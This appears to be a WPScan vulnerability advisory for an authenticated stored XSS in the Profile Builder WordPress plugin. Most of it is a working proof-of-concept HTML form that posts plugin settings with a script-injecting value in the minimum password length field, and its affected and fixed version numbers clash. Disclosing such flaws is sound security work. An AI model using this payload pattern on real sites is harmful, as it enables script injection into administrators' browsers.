Profile Builder <= 5.2.7 - Authenticated Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Stored Cross-Site Scripting (XSS) in field minimum password length.
Proof of Concept
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp/wp-admin/options.php" method="POST">
      <input type="hidden" name="option&#95;page" value="wppb&#95;general&#95;settings" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="&#95;wpnonce" value="a37f914f93" />
      <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;admin&#46;php&#63;page&#61;profile&#45;builder&#45;general&#45;settings" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;extraFieldsLayout&#93;" value="default" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;emailConfirmation&#93;" value="no" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;activationLandingPage&#93;" value="" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;loginWith&#93;" value="usernameemail" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;length&#93;" value="8&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;strength&#93;" value="strong" />
      <input type="hidden" name="action" value="update" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 2.5.8

References

URL https://plugins.trac.wordpress.org/changeset/1607426/profile-builder

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter f3ci
Submitter Website spentera.id
Views 166
Verified No
WPVDB ID 8776

Timeline

Publicly Published 2017-03-10 (8 months ago)
Added 2017-03-15 (7 months ago)
Last Updated 2017-03-15 (7 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.